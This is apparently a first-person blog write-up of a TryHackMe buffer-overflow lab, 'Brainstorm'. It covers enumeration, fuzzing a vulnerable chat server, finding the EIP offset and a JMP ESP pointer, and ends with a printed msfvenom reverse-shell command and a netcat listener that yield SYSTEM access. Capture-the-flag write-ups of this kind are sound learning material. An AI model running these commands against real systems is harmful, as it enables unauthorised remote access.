
tryhackme writeup: brainstorm

for a while now, i've noticed that i let a lot of writeup drafts pile up without ever publishing them. usually when i get back to them, i forgot most of what the CTF was about and it becomes nightmarish to publish it.

the solution to this is obvious: just write the entire blog post while doing the CTF! which is something i'm gonna do for this tryhackme room.

brainstorm should be a simple reverse engineering room, as it's meant to practice basic stack-based buffer overflows. this should be fun and i definitely need that kind of refresher, so let's begin!


as usual, we're going to scan and enumerate the network as we have to begin somewhere.


let's run the following command, which will allow nmap to scan which services are running with their versions info, run standard scripts, keep scanning even if it doesn't respond to ping and proceed faster for all of this:

nmap -sV -sC -Pn -T4 <ip-address>

this outputs the following results:

# Nmap 7.92 scan initiated Thu May 12 15:12:15 2022 as: nmap -sV -sC -T4 -Pn
Nmap scan report for
Host is up (0.031s latency).
Not shown: 997 filtered tcports (no-response)
21/tcp   open  ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2022-05-12T13:15:30+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=brainstorm
| Not valid before: 2022-05-11T12:48:05
|_Not valid after:  2022-11-10T12:48:05
| rdp-ntlm-info: 
|   Target_Name: BRAINSTORM
|   NetBIOS_Domain_Name: BRAINSTORM
|   NetBIOS_Computer_Name: BRAINSTORM
|   DNS_Domain_Name: brainstorm
|   DNS_Computer_Name: brainstorm
|   Product_Version: 6.1.7601
|_  System_Time: 2022-05-12T13:15:00+00:00
9999/tcp open  abyss?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     Welcome to Brainstorm chat (beta)
|     Please enter your username (max 20 characters): Write a message:
|   NULL: 
|     Welcome to Brainstorm chat (beta)
|_    Please enter your username (max 20 characters):

website or web services


other services


relevant findings for exploitation

our nmap output already tells us a lot:


first things first, let's connect to the FTP server:

screenshot showing a connection to the FTP server with anonymous login allowed

with anonymous login allowed, the credentials simply were anonymous:anonymous@ip-address.

i had some issues at this point with passive FTP mode and EPSV that prevented me to list directories: to disable those, simply run passive and epsv.

running dir, we can see the following directory:

screenshot showing a directory named "chatserver", listed on the FTP server

by listing the content in chatserver, we can find a copy of chatserver.exe and its DLL:

screenshot showing the content of the "chatserver" directory. two files are present: chatserver.exe and essfunc.dll

great! we can now download the program (and the DLL) to work on our buffer overflow, which we will then use on the real target (chatserver on port 9999).

ftp> binary
200 Type set to I.
ftp> get chatserver.exe
local: chatserver.exe remote: chatserver.exe
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |********* <snip>
226 Transfer complete.
43747 bytes received in 00:00 (264.86 KiB/s)
ftp> get essfunc.dll
local: essfunc.dll remote: essfunc.dll
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |******* <snip>
226 Transfer complete.
30761 bytes received in 00:00 (238.18 KiB/s)

quick aside: at this point i knew i had to use immunity debugger but couldn't be bothered setting an entire windows VM just for this task. turns out that immunity debugger works fine with wine on kali! just make sure to set the env variable winearch to win32 when installing it and you'll be all set.

first things first, let's see how the program behaves in a regular context. launching the chatserver.exe, we get a prompt to create a username and we're then free to send messages away:

screenshot showing a netcat connection being initiated on port 9999, used by chatserver.exe. a banner greets us and a prompt to enter our username and write a message appears

the program outputs the following while listening for a connection and processing our username and messages:

chatserver.exe logs screenshot. it outputs a call for its needed DLL, essfunc, then it's waiting for connections and once one has been established, outputs its address and port and finally the username that has been chosen

we might trigger a buffer overflow when creating our username or sending a message — or both. let's test that. the basic fuzzer that we're using is the following:

a quick python script that does basic fuzzing on the app. it initiates the connection that we initially did manually, and sends an increasingly bigger string of "AAAAA" until chatserver crashes

we quickly see that username creation implements a character limit so we won't trigger anything with this input:

chatserver logs again, that show our script has been poorly thought out as it doesn't account for the username creation step, which has a proper character limit and won't overflow

while editing the script to enter the username before fuzzing the app, i realized i could make it way simpler. i ended up rewriting it with the following:

rewrite of the previous pyton script, which includes the username creation step and is much more concise

running the script, we notice that the app is crashing after sending 2100 bytes. we now have our starting point to work on the buffer overflow!

to find the EIP offset, we generate a pattern of 2400 bytes and whip up a short exploit script, quite simple like our fuzzing script:

another python script with a payload of 2400 bytes that will help us locate the EIP offset with pattern_offset, a script present in kali linux

crashing the app, we get the following EIP register value:

screenshot of the EIP register value (31704330) as shown in immunity debugger

which allows us to find the EIP offset:

output of pattern_offset script, which deduces that the EIP offset is 2012 given the EIP register value

by editing our exploit script, we can confirm that the EIP offset is correct:

immunity screenshot showing the EIP register value (42424242) after changing our python script, to make sure that the offset is correct

great, smooth sailing ahead of us. what we have to do next is sorting out the badchars and exploit the .dll for privilege escalation. mona will come in useful for the latter.

finding the badchars is a simple and boring process: we just add them to our payload and find out what went wrong in our esp dump.

updated python script taking the offset we found into account, to inject the badchars properly and sort them out in the next step

screenshot of our ESP dump in immunity debugger, showing that we don't have any badchars except the null byte

turns out we don't have any badchars so we will be able to proceed without excluding them (except of course \x00). let's work on the .dll file next.

privilege escalation

first, let's take a look of the modules with mona. this is simply done with the !mona modules command in immunity:

output of the "!mona modules" command in immunity debugger, showing the .DLLs that chatserver.exe depends on along with their properties

we can see that essfunc.dll is a perfect candidate for privilege escalation because it has no memory protections whatsoever. if we can find a JMP ESP instruction that we can leverage for our payload, we should be good to go.
running msf-nasm_shell on kali, we can see that the hex instruction for JMP ESP is \xff\xe4:

output of msf-nasm_shell, showing the hex instruction for JMP ESP

to find this instruction in essfunc.dll, mona will again prove to be useful. running !mona find -s "\xff\xe4" -m essfunc.dll allow us to get the pointers for the instruction we're looking for:

output of "!mona find" command in immunity debugger, showing all the pointers leading to the "\xff\xe4" instruction

let's pick the first one and check if this works. we simply adjust our script with the address and change its endianness to match our win x86 target:

python script updated with our JMP ESP instruction address, reversed to match the endianness

and we put a breakpoint in immunity for the same address. running the exploit again, we notice that we have indeed control of the EIP:

screenshot of immunity debugger showing the value of the EIP register, now set to our JMP ESP instruction address

we're now ready to add the payload in our script and test it against the real target. to generate a payload, we use msfvenom with the following parameters to match the corresponding architecture of our target, add only the null byte to our list of badchars and make it play nicely with python:

output of "msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 EXITFUNC=thread -f python -b '\x00'" on kali linux. this generates our payload for a python script while excluding the null byte

our script now looks like this (let's not forget the nop sled too) and should hopefully be working:

screenshot of our updated and final python script, ready to inject msfvenom's payload

let's set up a netcat listener before running it with nc -lvnp 4444. and sure enough, we end up getting elevated privileges on our target, just as planned!

screenshot showing that we got a connection to our target. running the command "whoami" on windows outputs "nt authority\system", proving that we have elevated privileges